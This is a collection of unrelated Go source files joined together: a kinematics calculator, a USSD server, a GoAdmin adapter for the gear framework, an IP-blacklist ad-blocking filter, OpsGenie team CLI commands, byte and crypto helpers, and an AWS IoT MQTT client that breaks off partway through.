	m.value = value
}
// AddLabelValue takes in a key and value and sets it to the map in metric builder.
// The key must be one of the declared label keys; m.labels is kept sorted, so a
// binary search suffices for the membership test.
func (m *MetricBuilder) AddLabelValue(key string, value string) error {
	if i := sort.SearchStrings(m.labels, key); i < len(m.labels) && m.labels[i] == key {
		m.labelKeyValues[key] = value
		return nil
	}
	return fmt.Errorf("key %q not in metricBuilder labels %v", key, m.labels)
}
|
package main
import (
"fmt"
)
// GenDisplaceFn returns a displacement function of time for constant
// acceleration a, initial velocity v0 and initial displacement s0:
// s(t) = 0.5*a*t^2 + v0*t + s0.
func GenDisplaceFn(a, v0, s0 float64) func(float64) float64 {
	displacement := func(t float64) float64 {
		return 0.5*a*t*t + v0*t + s0
	}
	return displacement
}
// main reads the motion parameters, then repeatedly evaluates the
// displacement function until the user enters a negative time.
func main() {
	var a, v0, s0, t float64
	fmt.Println("Enter the initial values...")
	fmt.Printf("acceleration : ")
	fmt.Scanln(&a)
	fmt.Printf("initial velocity : ")
	fmt.Scanln(&v0)
	fmt.Printf("initial displacement : ") // fixed "intial" typo in the prompt
	fmt.Scanln(&s0)
	fn := GenDisplaceFn(a, v0, s0)
	// Idiomatic infinite loop (was `for true`); `t == -1 || t < 0` collapsed
	// to `t < 0` since -1 is already negative.
	for {
		fmt.Println("Enter the value of time : \nOr enter -1 to quit!")
		fmt.Scanln(&t)
		if t < 0 {
			break
		}
		fmt.Printf("displacement : ")
		fmt.Println(fn(t))
	}
	fmt.Println("Thank you!")
}
|
package main
import (
ussd "../ussd"
"log"
"net/http"
)
// main wires the USSD service into a mux and serves it on :8080.
func main() {
	// service binding
	mux := http.NewServeMux()
	ussd.RegisterService(mux)
	log.Println("hub is started...")
	//http.ListenAndServeTLS(":4002", "cert.pem", "key.pem", mux)
	// ListenAndServe blocks until failure; the error (e.g. port already in
	// use) was previously discarded, so startup problems went unreported.
	if err := http.ListenAndServe(":8080", mux); err != nil {
		log.Println("hub error:", err)
	}
	log.Println("hub is stopped.")
}
|
/***
# File Name: ../../adapter/gear/gear.go
# Author: eavesmy
# Email: eavesmy@gmail.com
# Created Time: 2021年06月03日 星期四 19时05分06秒
***/
package gear
import (
"bytes"
"errors"
"net/http"
"net/url"
"regexp"
"strings"
"github.com/GoAdminGroup/go-admin/adapter"
"github.com/GoAdminGroup/go-admin/context"
"github.com/GoAdminGroup/go-admin/engine"
"github.com/GoAdminGroup/go-admin/modules/config"
"github.com/GoAdminGroup/go-admin/modules/utils"
"github.com/GoAdminGroup/go-admin/plugins"
"github.com/GoAdminGroup/go-admin/plugins/admin/models"
"github.com/GoAdminGroup/go-admin/plugins/admin/modules/constant"
"github.com/GoAdminGroup/go-admin/template/types"
"github.com/teambition/gear"
)
// Gear structure value is a Gear GoAdmin adapter (doc previously said "Gin" —
// a copy-paste from the gin adapter).
type Gear struct {
	adapter.BaseAdapter
	ctx    *gear.Context
	app    *gear.App
	router *gear.Router
}
// init registers this adapter with the GoAdmin engine at import time.
func init() {
	engine.Register(new(Gear))
}
// User implements the method Adapter.User.
func (gears *Gear) User(ctx interface{}) (models.UserModel, bool) {
	return gears.GetUser(ctx, gears)
}

// Use implements the method Adapter.Use.
func (gears *Gear) Use(app interface{}, plugs []plugins.Plugin) error {
	return gears.GetUse(app, plugs, gears)
}

// Content implements the method Adapter.Content.
func (gears *Gear) Content(ctx interface{}, getPanelFn types.GetPanelFn, fn context.NodeProcessor, btns ...types.Button) {
	gears.GetContent(ctx, getPanelFn, gears, btns, fn)
}

// HandlerFunc is the gear-flavored signature for a GoAdmin content handler.
type HandlerFunc func(ctx *gear.Context) (types.Panel, error)

// Content wraps a HandlerFunc as gear middleware that renders a GoAdmin panel.
func Content(handler HandlerFunc) gear.Middleware {
	return func(ctx *gear.Context) error {
		engine.Content(ctx, func(ctx interface{}) (types.Panel, error) {
			return handler(ctx.(*gear.Context))
		})
		return nil
	}
}
// SetApp implements the method Adapter.SetApp. It stores the *gear.App and
// prepares a fresh router for AddHandler registrations.
func (gears *Gear) SetApp(app interface{}) error {
	// Use only the checked assertion: the old code did an unchecked
	// app.(*gear.App) first, which panicked before the error path could run,
	// and its error message said "beego adapter" (copy-paste).
	eng, ok := app.(*gear.App)
	if !ok {
		return errors.New("gear adapter SetApp: wrong parameter")
	}
	gears.app = eng
	gears.router = gear.NewRouter()
	return nil
}
// AddHandler implements the method Adapter.AddHandler. It registers the
// GoAdmin handler chain on the gear router, translating gear's ":param"
// path parameters into query-string values that GoAdmin's context reads,
// then copies GoAdmin's response back onto the gear response.
func (gears *Gear) AddHandler(method, path string, handlers context.Handlers) {
	if gears.router == nil {
		gears.router = gear.NewRouter()
	}
	gears.router.Handle(strings.ToUpper(method), path, func(c *gear.Context) error {
		ctx := context.NewContext(c.Req)
		// Collect ":name" segments (mid-path via reg1, trailing via reg2) from
		// the route pattern.
		newPath := path
		reg1 := regexp.MustCompile(":(.*?)/")
		reg2 := regexp.MustCompile(":(.*?)$")
		params := reg1.FindAllString(newPath, -1)
		newPath = reg1.ReplaceAllString(newPath, "")
		params = append(params, reg2.FindAllString(newPath, -1)...)
		// Append each path parameter to the raw query so GoAdmin can read it.
		for _, param := range params {
			p := utils.ReplaceAll(param, ":", "", "/", "")
			if c.Req.URL.RawQuery == "" {
				c.Req.URL.RawQuery += p + "=" + c.Param(p)
			} else {
				c.Req.URL.RawQuery += "&" + p + "=" + c.Param(p)
			}
		}
		ctx.SetHandlers(handlers).Next()
		// Mirror GoAdmin's response headers, body and status code.
		for key, head := range ctx.Response.Header {
			c.Res.Header().Add(key, head[0])
		}
		if ctx.Response.Body != nil {
			buf := new(bytes.Buffer)
			_, _ = buf.ReadFrom(ctx.Response.Body)
			return c.End(ctx.Response.StatusCode, buf.Bytes())
		}
		c.Status(ctx.Response.StatusCode)
		return nil
	})
	gears.app.UseHandler(gears.router)
}
// Name implements the method Adapter.Name.
func (*Gear) Name() string {
	return "gear"
}
// SetContext implements the method Adapter.SetContext. It returns a fresh
// adapter bound to the given *gear.Context, panicking on a wrong type.
func (*Gear) SetContext(contextInterface interface{}) adapter.WebFrameWork {
	ctx, ok := contextInterface.(*gear.Context)
	if !ok {
		panic("gear adapter SetContext: wrong parameter")
	}
	return &Gear{ctx: ctx}
}
// Redirect implements the method Adapter.Redirect.
func (gears *Gear) Redirect() {
	gears.ctx.Redirect(config.Url(config.GetLoginUrl()))
}

// SetContentType implements the method Adapter.SetContentType.
func (gears *Gear) SetContentType() {
	gears.ctx.Res.Header().Set("Content-Type", gears.HTMLContentType())
}

// Write implements the method Adapter.Write.
func (gears *Gear) Write(body []byte) {
	gears.ctx.End(http.StatusOK, body)
}

// GetCookie implements the method Adapter.GetCookie.
func (gears *Gear) GetCookie() (string, error) {
	return gears.ctx.Cookies.Get(gears.CookieKey())
}

// Lang implements the method Adapter.Lang.
func (gears *Gear) Lang() string {
	return gears.ctx.Req.URL.Query().Get("__ga_lang")
}

// Path implements the method Adapter.Path.
func (gears *Gear) Path() string {
	return gears.ctx.Req.URL.Path
}

// Method implements the method Adapter.Method.
func (gears *Gear) Method() string {
	return gears.ctx.Req.Method
}

// FormParam implements the method Adapter.FormParam.
// The multipart form is parsed with a 32 MiB memory limit; the parse error is
// deliberately ignored (best effort, empty PostForm on failure).
func (gears *Gear) FormParam() url.Values {
	_ = gears.ctx.Req.ParseMultipartForm(32 << 20)
	return gears.ctx.Req.PostForm
}

// IsPjax implements the method Adapter.IsPjax.
func (gears *Gear) IsPjax() bool {
	return gears.ctx.Req.Header.Get(constant.PjaxHeader) == "true"
}

// Query implements the method Adapter.Query.
func (gears *Gear) Query() url.Values {
	return gears.ctx.Req.URL.Query()
}
|
package filters
import (
"net"
"github.com/jlorgal/odor/odor"
)
// AdBlocking filter. Drops traffic addressed to blacklisted ad-serving networks.
type AdBlocking struct {
	blacklist []*net.IPNet
}

// NewAdBlocking creates an AdBlocking filter (doc previously said "Malware
// filter" — a copy-paste) backed by the "adBlocking" blacklist from config.
func NewAdBlocking(config *odor.Config) (*AdBlocking, error) {
	blacklist, err := odor.GetBlacklist("adBlocking", config)
	return &AdBlocking{blacklist: blacklist}, err
}
// Request filters ingress packets. It drops IPv4 packets whose destination is
// on the blacklist, but only for profiles with ad blocking enabled.
func (a *AdBlocking) Request(context *odor.Context) odor.FilterAction {
	if context.Profile == nil || !context.Profile.AdBlocking {
		return odor.Accept
	}
	if ipv4 := odor.GetIPv4Layer(context.Packet); ipv4 != nil {
		if odor.IsBlacklistedIP(a.blacklist, ipv4.DstIP) {
			return odor.Drop
		}
	}
	return odor.Accept
}

// Response filters egress packets. Responses are always accepted; only the
// request direction is filtered.
func (a *AdBlocking) Response(context *odor.Context) odor.FilterAction {
	return odor.Accept
}
|
package command
import (
"context"
"github.com/opsgenie/opsgenie-go-sdk-v2/team"
gcli "github.com/urfave/cli"
"os"
"strconv"
"strings"
)
// NewTeamClient creates an OpsGenie team API client from the CLI
// configuration, exiting the process when construction fails.
func NewTeamClient(c *gcli.Context) *team.Client {
	teamCli, cliErr := team.NewClient(getConfigurations(c))
	if cliErr == nil {
		printMessage(DEBUG, "Team Client created.")
		return teamCli
	}
	printMessage(INFO, "Can not create the team client. "+cliErr.Error())
	os.Exit(1)
	return teamCli
}
// CreateTeamAction creates a team from the CLI flags (name, desc, userName,
// userId, role) and prints the API response.
func CreateTeamAction(c *gcli.Context) {
	teamCli := NewTeamClient(c)
	createTeamRequest := &team.CreateTeamRequest{}
	if teamName, ok := getVal("name", c); ok {
		createTeamRequest.Name = teamName
	}
	if desc, ok := getVal("desc", c); ok {
		createTeamRequest.Description = desc
	}
	userName, _ := getVal("userName", c)
	userID, _ := getVal("userId", c)
	createTeamRequest.Members = []team.Member{
		{
			User: team.User{
				Username: userName,
				ID:       userID,
			},
		},
	}
	if role, ok := getVal("role", c); ok {
		createTeamRequest.Members[0].Role = role
	}
	// Removed the stray printResponse(createTeamRequest, nil, c) call that
	// echoed the request object before sending it — no sibling action does
	// this and it produced a bogus extra "response" in the output.
	resp, err := teamCli.Create(context.Background(), createTeamRequest)
	printResponse(resp, err, c)
}
// UpdateTeamAction updates a team (identified by --id) with the name,
// description and member/role flags, then prints the API response.
func UpdateTeamAction(c *gcli.Context) {
	teamCli := NewTeamClient(c)
	updateTeamRequest := &team.UpdateTeamRequest{}
	if teamName, ok := getVal("name", c); ok {
		updateTeamRequest.Name = teamName
	}
	if desc, ok := getVal("desc", c); ok {
		updateTeamRequest.Description = desc
	}
	if ID, ok := getVal("id", c); ok {
		updateTeamRequest.Id = ID
	}
	userName, _ := getVal("userName", c)
	userID, _ := getVal("userId", c)
	updateTeamRequest.Members = []team.Member{
		{
			User: team.User{
				Username: userName,
				ID:       userID,
			},
		},
	}
	if role, ok := getVal("role", c); ok {
		updateTeamRequest.Members[0].Role = role
	}
	resp, err := teamCli.Update(context.Background(), updateTeamRequest)
	printResponse(resp, err, c)
}

// GetTeamAction fetches a team by --name (preferred) or --id and prints it.
func GetTeamAction(c *gcli.Context) {
	teamCli := NewTeamClient(c)
	getTeamRequest := &team.GetTeamRequest{}
	if teamName, ok := getVal("name", c); ok {
		getTeamRequest = &team.GetTeamRequest{
			IdentifierType:  team.Name,
			IdentifierValue: teamName,
		}
	} else if teamID, ok := getVal("id", c); ok {
		getTeamRequest = &team.GetTeamRequest{
			IdentifierType:  team.Id,
			IdentifierValue: teamID,
		}
	}
	resp, err := teamCli.Get(context.Background(), getTeamRequest)
	printResponse(resp, err, c)
}
// DeleteTeamAction deletes a team identified by --name (preferred) or --id
// and prints the API response.
func DeleteTeamAction(c *gcli.Context) {
	teamCli := NewTeamClient(c)
	// Start from an empty request (like GetTeamAction does) so that a call
	// with neither flag set sends an empty request instead of a nil pointer.
	deleteTeamRequest := &team.DeleteTeamRequest{}
	if teamName, ok := getVal("name", c); ok {
		deleteTeamRequest = &team.DeleteTeamRequest{
			IdentifierType:  team.Name,
			IdentifierValue: teamName,
		}
	} else if teamID, ok := getVal("id", c); ok {
		deleteTeamRequest = &team.DeleteTeamRequest{
			IdentifierType:  team.Id,
			IdentifierValue: teamID,
		}
	}
	resp, err := teamCli.Delete(context.Background(), deleteTeamRequest)
	printResponse(resp, err, c)
}
// ListTeamsAction lists all teams and prints the API response.
func ListTeamsAction(c *gcli.Context) {
	teamCli := NewTeamClient(c)
	resp, err := teamCli.List(context.Background(), &team.ListTeamRequest{})
	printResponse(resp, err, c)
}

// ListRolesAction lists a team's roles; the team is identified by --name
// (preferred) or --id.
func ListRolesAction(c *gcli.Context) {
	teamCli := NewTeamClient(c)
	listTeamRolesRequest := &team.ListTeamRoleRequest{}
	if teamName, ok := getVal("name", c); ok {
		listTeamRolesRequest = &team.ListTeamRoleRequest{
			TeamIdentifierType:  team.Name,
			TeamIdentifierValue: teamName,
		}
	} else if teamID, ok := getVal("id", c); ok {
		listTeamRolesRequest = &team.ListTeamRoleRequest{
			TeamIdentifierType:  team.Id,
			TeamIdentifierValue: teamID,
		}
	}
	resp, err := teamCli.ListRole(context.Background(), listTeamRolesRequest)
	printResponse(resp, err, c)
}
// CreateRoleAction creates a team role named --roleName with the
// comma-separated --rights (all granted); the team is identified by --name
// (preferred) or --id.
func CreateRoleAction(c *gcli.Context) {
	teamCli := NewTeamClient(c)
	createTeamRoleRequest := &team.CreateTeamRoleRequest{}
	if teamName, ok := getVal("name", c); ok {
		createTeamRoleRequest.TeamIdentifierType = team.Name
		createTeamRoleRequest.TeamIdentifierValue = teamName
	} else if teamID, ok := getVal("id", c); ok {
		createTeamRoleRequest.TeamIdentifierType = team.Id
		createTeamRoleRequest.TeamIdentifierValue = teamID
	}
	if roleName, ok := getVal("roleName", c); ok {
		createTeamRoleRequest.Name = roleName
	}
	roleRights := []team.Right{}
	// Every listed right is granted; the API takes *bool, hence the variable.
	granted := true
	if rightsArgVal, ok := getVal("rights", c); ok {
		rights := strings.Split(rightsArgVal, ",")
		for _, right := range rights {
			roleRights = append(roleRights, team.Right{
				Right:   right,
				Granted: &granted,
			})
		}
	}
	createTeamRoleRequest.Rights = roleRights
	resp, err := teamCli.CreateRole(context.Background(), createTeamRoleRequest)
	printResponse(resp, err, c)
}
// ListRoleRightsAction prints the static catalog of team-role rights
// (name, human description, category) as a JSON-style response.
func ListRoleRightsAction(c *gcli.Context) {
	type right struct {
		Name        string `json:"name"`
		Description string `json:"description"`
		Category    string `json:"category"`
	}
	roleRights := []right{
		{
			Name:        "manage-members",
			Description: "Manage Team Members",
			Category:    "Member Management",
		},
		{
			Name: "edit-team-roles",
			// Fixed typo: was "reate/Update Team Roles".
			Description: "Create/Update Team Roles",
			Category:    "Member Management",
		},
		{
			Name:        "delete-team-roles",
			Description: "Delete Team Roles",
			Category:    "Member Management",
		},
		{
			Name:        "access-member-profiles",
			Description: "Access Profiles of Team Members",
			Category:    "Member Management",
		},
		{
			Name:        "edit-member-profiles",
			Description: "Edit Profiles of Team Members",
			Category:    "Member Management",
		},
		{
			Name:        "edit-routing-rules",
			Description: "Create/Update Routing Rules",
			Category:    "Configurations",
		},
		{
			Name:        "delete-routing-rules",
			Description: "Delete Routing Rules",
			Category:    "Configurations",
		},
		{
			Name:        "edit-escalations",
			Description: "Create/Update Escalations",
			Category:    "Configurations",
		},
		{
			Name:        "delete-escalations",
			Description: "Delete Escalations",
			Category:    "Configurations",
		},
		{
			Name:        "edit-schedules",
			Description: "Create/Update Schedules",
			Category:    "Configurations",
		},
		{
			Name:        "delete-schedules",
			Description: "Delete Schedules",
			Category:    "Configurations",
		},
		{
			Name:        "edit-integrations",
			Description: "Create/Update Integrations",
			Category:    "Configurations",
		},
		{
			Name:        "delete-integrations",
			Description: "Delete Integrations",
			Category:    "Configurations",
		},
		{
			Name:        "edit-automation-actions",
			Description: "Create/Update Automation Actions",
			Category:    "Configurations",
		},
		{
			Name:        "delete-automation-actions",
			Description: "Delete Automation Actions",
			Category:    "Configurations",
		},
		{
			Name:        "edit-heartbeats",
			Description: "Create/Update Heartbeats",
			Category:    "Configurations",
		},
		{
			Name:        "delete-heartbeats",
			Description: "Delete Heartbeats",
			Category:    "Configurations",
		},
		{
			Name:        "edit-policies",
			Description: "Create/Update Policies",
			Category:    "Configurations",
		},
		{
			Name:        "delete-policies",
			Description: "Delete Policies",
			Category:    "Configurations",
		},
		{
			Name:        "edit-maintenance",
			Description: "Create/Update Maintenance",
			Category:    "Configurations",
		},
		{
			Name:        "delete-maintenance",
			Description: "Delete Maintenance",
			Category:    "Configurations",
		},
		{
			Name:        "access-reports",
			Description: "Access Reports",
			Category:    "Configurations",
		},
		{
			Name:        "edit-services",
			Description: "Create/Update Services",
			Category:    "Incident Configurations",
		},
		{
			Name:        "delete-services",
			Description: "Delete Services",
			Category:    "Incident Configurations",
		},
		{
			Name:        "edit-rooms",
			Description: "Create/Update Rooms",
			Category:    "Incident Configurations",
		},
		{
			Name:        "delete-rooms",
			Description: "Delete Rooms",
			Category:    "Incident Configurations",
		},
		{
			Name:        "subscription-to-services",
			Description: "Subscription To Services",
			Category:    "Incident Configurations",
		},
	}
	printResponse(struct {
		Rights []right `json:"rights"`
	}{roleRights}, nil, c)
}
// ListTeamRoutingRulesAction lists a team's routing rules; the team is
// identified by --name (preferred) or --id.
func ListTeamRoutingRulesAction(c *gcli.Context) {
	teamCli := NewTeamClient(c)
	listRoutingRulesRequest := &team.ListRoutingRulesRequest{}
	if teamName, ok := getVal("name", c); ok {
		listRoutingRulesRequest = &team.ListRoutingRulesRequest{
			TeamIdentifierType:  team.Name,
			TeamIdentifierValue: teamName,
		}
	} else if teamID, ok := getVal("id", c); ok {
		listRoutingRulesRequest = &team.ListRoutingRulesRequest{
			TeamIdentifierType:  team.Id,
			TeamIdentifierValue: teamID,
		}
	}
	resp, err := teamCli.ListRoutingRules(context.Background(), listRoutingRulesRequest)
	printResponse(resp, err, c)
}

// DeleteTeamRoutingRuleAction deletes routing rule --ruleId from a team
// identified by --name (preferred) or --id.
func DeleteTeamRoutingRuleAction(c *gcli.Context) {
	teamCli := NewTeamClient(c)
	deleteRoutingRuleRequest := &team.DeleteRoutingRuleRequest{}
	if teamName, ok := getVal("name", c); ok {
		deleteRoutingRuleRequest = &team.DeleteRoutingRuleRequest{
			TeamIdentifierType:  team.Name,
			TeamIdentifierValue: teamName,
		}
	} else if teamID, ok := getVal("id", c); ok {
		deleteRoutingRuleRequest = &team.DeleteRoutingRuleRequest{
			TeamIdentifierType:  team.Id,
			TeamIdentifierValue: teamID,
		}
	}
	if ruleID, ok := getVal("ruleId", c); ok {
		deleteRoutingRuleRequest.RoutingRuleId = ruleID
	}
	resp, err := teamCli.DeleteRoutingRule(context.Background(), deleteRoutingRuleRequest)
	printResponse(resp, err, c)
}
// GetTeamRoleAction fetches one team role. Team is identified by --teamName
// or --teamId; the role by --roleName or --roleId.
func GetTeamRoleAction(c *gcli.Context) {
	teamCli := NewTeamClient(c)
	getTeamRoleRequest := &team.GetTeamRoleRequest{}
	if teamName, ok := getVal("teamName", c); ok {
		getTeamRoleRequest.TeamName = teamName
	} else if teamID, ok := getVal("teamId", c); ok {
		getTeamRoleRequest.TeamID = teamID
	}
	if roleName, ok := getVal("roleName", c); ok {
		getTeamRoleRequest.RoleName = roleName
	} else if roleID, ok := getVal("roleId", c); ok {
		getTeamRoleRequest.RoleID = roleID
	}
	resp, err := teamCli.GetRole(context.Background(), getTeamRoleRequest)
	printResponse(resp, err, c)
}

// DeleteTeamRoleAction deletes one team role. Team is identified by
// --teamName or --teamId; the role by --roleName or --roleId.
func DeleteTeamRoleAction(c *gcli.Context) {
	teamCli := NewTeamClient(c)
	deleteTeamRoleRequest := &team.DeleteTeamRoleRequest{}
	if teamName, ok := getVal("teamName", c); ok {
		deleteTeamRoleRequest.TeamName = teamName
	} else if teamID, ok := getVal("teamId", c); ok {
		deleteTeamRoleRequest.TeamID = teamID
	}
	if roleName, ok := getVal("roleName", c); ok {
		deleteTeamRoleRequest.RoleName = roleName
	} else if roleID, ok := getVal("roleId", c); ok {
		deleteTeamRoleRequest.RoleID = roleID
	}
	resp, err := teamCli.DeleteRole(context.Background(), deleteTeamRoleRequest)
	printResponse(resp, err, c)
}
// AddMemberAction adds a user to a team. The team is selected by --teamName
// or --teamId, the user by --userId or --userName; --role is optional.
func AddMemberAction(c *gcli.Context) {
	cli := NewTeamClient(c)
	req := &team.AddTeamMemberRequest{}
	if v, ok := getVal("teamName", c); ok {
		req.TeamIdentifierType = team.Name
		req.TeamIdentifierValue = v
	} else if v, ok := getVal("teamId", c); ok {
		req.TeamIdentifierType = team.Id
		req.TeamIdentifierValue = v
	}
	if v, ok := getVal("role", c); ok {
		req.Role = v
	}
	if v, ok := getVal("userId", c); ok {
		req.User.ID = v
	} else if v, ok := getVal("userName", c); ok {
		req.User.Username = v
	}
	resp, err := cli.AddMember(context.Background(), req)
	printResponse(resp, err, c)
}
// RemoveMemberAction removes a member from a team. The team is selected by
// --teamName or --teamId, the member by --userId or --userName.
func RemoveMemberAction(c *gcli.Context) {
	cli := NewTeamClient(c)
	req := &team.RemoveTeamMemberRequest{}
	if v, ok := getVal("teamName", c); ok {
		req.TeamIdentifierType = team.Name
		req.TeamIdentifierValue = v
	} else if v, ok := getVal("teamId", c); ok {
		req.TeamIdentifierType = team.Id
		req.TeamIdentifierValue = v
	}
	if v, ok := getVal("userId", c); ok {
		req.MemberIdentifierType = team.Id
		req.MemberIdentifierValue = v
	} else if v, ok := getVal("userName", c); ok {
		req.MemberIdentifierType = team.Username
		req.MemberIdentifierValue = v
	}
	resp, err := cli.RemoveMember(context.Background(), req)
	printResponse(resp, err, c)
}
// GetRoutingRuleAction fetches one routing rule of a team. The team is
// selected by --teamName or --teamId, the rule by --ruleId.
func GetRoutingRuleAction(c *gcli.Context) {
	cli := NewTeamClient(c)
	req := &team.GetRoutingRuleRequest{}
	if v, ok := getVal("teamName", c); ok {
		req.TeamIdentifierType = team.Name
		req.TeamIdentifierValue = v
	} else if v, ok := getVal("teamId", c); ok {
		req.TeamIdentifierType = team.Id
		req.TeamIdentifierValue = v
	}
	if v, ok := getVal("ruleId", c); ok {
		req.RoutingRuleId = v
	}
	resp, err := cli.GetRoutingRule(context.Background(), req)
	printResponse(resp, err, c)
}
// ListTeamLogsAction lists a team's activity logs. The team is selected by
// --name or --id; --limit, --offset and --order are optional paging options.
// A non-numeric limit/offset exits with status 2 (same as before).
func ListTeamLogsAction(c *gcli.Context) {
	cli := NewTeamClient(c)
	req := &team.ListTeamLogsRequest{}
	if v, ok := getVal("name", c); ok {
		req.IdentifierType = team.Name
		req.IdentifierValue = v
	} else if v, ok := getVal("id", c); ok {
		req.IdentifierType = team.Id
		req.IdentifierValue = v
	}
	if raw, ok := getVal("limit", c); ok {
		n, err := strconv.Atoi(raw)
		if err != nil {
			os.Exit(2)
		}
		req.Limit = n
	}
	if raw, ok := getVal("offset", c); ok {
		n, err := strconv.Atoi(raw)
		if err != nil {
			os.Exit(2)
		}
		req.Offset = n
	}
	if v, ok := getVal("order", c); ok {
		req.Order = v
	}
	resp, err := cli.ListTeamLogs(context.Background(), req)
	printResponse(resp, err, c)
}
// printResponse renders an API response as JSON on stdout, honoring the
// --pretty flag. On any error it prints the error message and exits with
// status 1.
func printResponse(resp interface{}, err error, c *gcli.Context) {
	if err != nil {
		// Previously a request error caused a silent os.Exit(1); report it
		// the same way the JSON-marshalling error below is reported.
		printMessage(ERROR, err.Error())
		os.Exit(1)
	}
	isPretty := c.IsSet("pretty")
	output, err := resultToJSON(resp, isPretty)
	if err != nil {
		printMessage(ERROR, err.Error())
		os.Exit(1)
	}
	printMessage(INFO, output)
}
|
package tool
import (
"crypto/rand"
"crypto/sha256"
"net"
"os"
"time"
)
// FillBytesToFront left-pads data with zero bytes up to totalLen, or
// truncates it to its first totalLen bytes when it is already long enough.
// The result always has length totalLen (totalLen must be >= 0).
func FillBytesToFront(data []byte, totalLen int) []byte {
	if len(data) < totalLen {
		// Allocate the zero-filled result in one shot instead of growing a
		// slice byte-by-byte; make() guarantees the prefix is all zeroes.
		padded := make([]byte, totalLen)
		copy(padded[totalLen-len(data):], data)
		return padded
	}
	return data[:totalLen]
}
// SHA256 returns the 32-byte SHA-256 digest of data.
func SHA256(data []byte) []byte {
	digest := sha256.Sum256(data)
	return digest[:]
}
// SliceByteWhenEncount strips the leading run of bytes equal to encount from
// d and returns the remainder; it returns nil when every byte matches (or d
// is empty).
func SliceByteWhenEncount(d []byte, encount byte) []byte {
	i := 0
	for i < len(d) && d[i] == encount {
		i++
	}
	if i == len(d) {
		return nil
	}
	return d[i:]
}
// RandomString returns a cryptographically random string of length n drawn
// from [0-9A-Za-z]. Note: 256 is not a multiple of 62, so there is a slight
// modulo bias — fine for identifiers, not for uniformity-critical secrets.
func RandomString(n int) string {
	const alphanum = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
	buf := make([]byte, n)
	// The crypto/rand.Read error was previously ignored; a failed read would
	// have silently produced a predictable (all-'0') string.
	if _, err := rand.Read(buf); err != nil {
		panic(err)
	}
	for i, b := range buf {
		buf[i] = alphanum[b%byte(len(alphanum))]
	}
	return string(buf)
}
// GenerateBytes returns a slice of the given length with every byte set to b.
// It panics on a negative length (the previous countdown loop would have
// spun forever in that case).
func GenerateBytes(length int, b byte) []byte {
	// Single allocation instead of repeated append-and-grow.
	out := make([]byte, length)
	for i := range out {
		out[i] = b
	}
	return out
}
// Timeout returns a channel that receives true once t has elapsed.
// The channel is buffered (capacity 1) so the timer goroutine can always
// complete its send and exit; the old unbuffered version leaked a goroutine
// forever whenever the caller stopped listening.
func Timeout(t time.Duration) chan bool {
	done := make(chan bool, 1)
	go func() {
		time.Sleep(t)
		done <- true
	}()
	return done
}
// GetIpAddress resolves the local hostname and returns the addresses it maps
// to via the system resolver.
func GetIpAddress() ([]string, error) {
	hostname, err := os.Hostname()
	if err != nil {
		return nil, err
	}
	return net.LookupHost(hostname)
}
|
package main
import (
"crypto/tls"
"crypto/x509"
"encoding/json"
"flag"
"fmt"
"io/ioutil"
"time"
MQTT "github.com/eclipse/paho.mqtt.golang"
)
// Config holds the AWS IoT connection properties loaded from the JSON
// configuration file (see readFromConfigFile).
type Config struct {
	Host string `json:"host"` // AWS IoT endpoint host name
	Port int `json:"port"` // TLS port of the endpoint
	CaCert string `json:"caCert"` // path to the root CA certificate (PEM)
	ClientCert string `json:"clientCert"` // path to the device certificate (PEM)
	PrivateKey string `json:"privateKey"` // path to the device private key (PEM)
}
// getSettingsFromFile reads the JSON config at p and applies the resulting
// TLS configuration and broker URI to opts.
func getSettingsFromFile(p string, opts *MQTT.ClientOptions) error {
	conf, err := readFromConfigFile(p)
	if err != nil {
		return err
	}
	tlsConfig, err := makeTLSConfig(conf.CaCert, conf.ClientCert, conf.PrivateKey)
	if err != nil {
		return err
	}
	opts.SetTLSConfig(tlsConfig)
	opts.AddBroker(fmt.Sprintf("ssl://%s:%d", conf.Host, conf.Port))
	return nil
}
// readFromConfigFile loads and decodes the JSON configuration file at path.
// On error the zero Config is returned alongside the error.
func readFromConfigFile(path string) (Config, error) {
	var conf Config
	raw, err := ioutil.ReadFile(path)
	if err != nil {
		return conf, err
	}
	if err := json.Unmarshal(raw, &conf); err != nil {
		return conf, err
	}
	return conf, nil
}
// makeTLSConfig builds a TLS configuration from the CA certificate, client
// certificate and private key PEM files.
func makeTLSConfig(cafile, cert, key string) (*tls.Config, error) {
	rootCAs, err := getCertPool(cafile)
	if err != nil {
		return nil, err
	}
	clientCAs, err := getCertPool(cert)
	if err != nil {
		return nil, err
	}
	keyPair, err := tls.LoadX509KeyPair(cert, key)
	if err != nil {
		return nil, err
	}
	// NOTE(review): ClientAuth/ClientCAs are server-side TLS settings and
	// look redundant for an outbound MQTT client — confirm before removing.
	return &tls.Config{
		InsecureSkipVerify: false,
		RootCAs:            rootCAs,
		ClientAuth:         tls.RequireAndVerifyClientCert,
		ClientCAs:          clientCAs,
		Certificates:       []tls.Certificate{keyPair},
	}, nil
}
// getCertPool loads the PEM file at pemPath into a fresh x509.CertPool.
// It fails loudly when the file contains no parsable certificates instead of
// silently returning an empty pool (the previous behavior, which made TLS
// failures very hard to diagnose).
func getCertPool(pemPath string) (*x509.CertPool, error) {
	pemData, err := ioutil.ReadFile(pemPath)
	if err != nil {
		return nil, err
	}
	certs := x509.NewCertPool()
	if !certs.AppendCertsFromPEM(pemData) {
		return nil, fmt.Errorf("no certificates found in %s", pemPath)
	}
	return certs, nil
}
// ArgOption holds the command line arguments accepted by this program.
type ArgOption struct {
	Conf string // path to the JSON config file (decoded into Config)
	ClientID string // MQTT client id to connect with
}
// NewOption creates MQTT client options for AWS IoT from the configuration
// file and client id carried in args. Auto-reconnect is always enabled.
func NewOption(args *ArgOption) (*MQTT.ClientOptions, error) {
	opts := MQTT.NewClientOptions()
	if err := getSettingsFromFile(args.Conf, opts); err != nil {
		return nil, err
	}
	opts.SetClientID(args.ClientID)
	opts.SetAutoReconnect(true)
	return opts, nil
}
// f is the default message handler: it dumps each incoming message's topic
// and payload to stdout.
var f MQTT.MessageHandler = func(client MQTT.Client, msg MQTT.Message) {
	fmt.Printf("TOPIC: %s\n", msg.Topic())
	fmt.Printf("MSG: %s\n", msg.Payload())
}
// args holds the parsed command-line options; populated by flag.Parse in main.
var args ArgOption

// main connects to AWS IoT over MQTT using the supplied config file,
// subscribes to go-mqtt/sample, publishes five demo messages, waits briefly,
// then unsubscribes and disconnects.
func main() {
	flag.StringVar(&args.Conf, "conf", "", "Config file JSON path and name for accessing to AWS IoT endpoint")
	flag.StringVar(&args.ClientID, "client-id", "", "client id to connect with")
	flag.Parse()
	opts, err := NewOption(&args)
	if err != nil {
